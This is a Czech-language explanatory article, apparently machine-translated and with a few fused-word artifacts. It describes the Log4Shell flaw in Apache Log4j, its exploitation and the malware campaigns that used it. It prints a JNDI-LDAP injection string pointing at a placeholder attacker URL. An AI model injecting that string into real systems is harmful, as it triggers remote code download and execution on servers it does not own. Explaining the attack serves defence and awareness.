Chyba zabezpečení Log4Shell

Dne 10. prosince 2021 byl vydán exploit pro kritickou zranitelnost v protokolovací platformě založené na Apache Log4j Java.veřejně. Tato chyba zabezpečení je sledována jako CVE-2021-44228 nebo Log4Shell a má dopad na verze Log4j od Log4j 2.0-beta9 až po 2.14.1. Aktéři hrozeb mohou využít zneužití k vytvoření neověřeného vzdáleného přístupu, spuštění kódu, šíření malwarových hrozeb nebo shromažďování informací. Zranitelnosti je přiřazen kritický stav, protože Log4j je široce používán podnikovými aplikacemi a cloudovými službami.

Technické detaily Log4Shell

Zneužití začíná tím, že aktér hrozby změní uživatelského agenta svého webového prohlížeče. Poté navštíví web nebo vyhledá konkrétní řetězec přítomný na webech ve formátu:

${jndi:ldap://[URL_attacker]}

V důsledku toho bude řetězec přidán do protokolů přístupu webového serveru. Útočníci pak čekají, až aplikace Log4j analyzuje tyto protokoly a dosáhne připojeného řetězce. V tomto případě se chyba spustí a způsobí, že server provede zpětné volání na adresu URL přítomnou v řetězci JNDI. Tato adresa URL je zneužita ke zpracování příkazů kódovaných v Base64 nebo tříd Javanásledně a spustit je na napadeném zařízení.

Apache rychle vydal novou verzi - Log4j 2.15.0, která řeší a opravuje exploit, ale značné množství zranitelných systémů mohlo zůstat neopraveno po dlouhou dobu. Zároveň si aktéři hrozeb rychle všimli zranitelnosti Log4Shell zero-day a začali hledat vhodné servery, které by bylo možné zneužít. Komunita infosec sledovala četné útočné kampaně využívající Log4Shell k poskytování široké řady malwarových hrozeb.

Log4Shell se používá při útocích na kryptominy, botnety, backdoor a sběr dat

Jedním z prvních aktérů hrozeb, kteří implementovali Log4Shell do svých operací, byli kyberzločinci stojící za krypto-těžebním botnetem Kinsing. Hackeři použili Log4Shell k doručení dat zakódovaných v Base64 a spouštění skriptů shellu. Úlohou těchto skriptů je vyčistit cílový systém od konkurenčních hrozeb pro těžbu kryptoměn ještě před spuštěním jejich vlastního malwaru Kinsing.

Netlab 360 detekoval aktéry ohrožení pomocí zranitelnosti k instalaci verzí botnetů Mirai a Muhstik na napadená zařízení. Tyto malwarové hrozby jsou navrženy tak, aby přidaly infikované systémy do sítě IoT zařízení a serverů, které pak útočníci mohou instruovat ke spuštění DDoS (Distributed Denial-of-Service) útoků nebo nasazení krypto-těžařů.následně.

Podle Microsoft Threat Intelligence Center byl zneužití Log4j také cílem útočných kampaní shazujících majáky Cobalt Strike. Cobalt Strike je legitimní softwarový nástroj používaný k penetračnímu testování proti firemním bezpečnostním systémům.Jeho zadní vrátka z něj však učinily běžnou součást arzenálu četných skupin hrozeb. Poté je nelegální přístup zadními vrátky do sítě oběti použit k poskytování užitečného zatížení další fáze, jako je ransomware, krádeže informací a další hrozby malwaru.

Log4Shell lze využít k získání proměnných prostředí obsahujících data serveru. Útočníci tak mohou získat přístup ke jménu hostitele, názvu OS, číslu verze OS, uživatelskému jménu, pod kterým služba Log4j běží a dalším.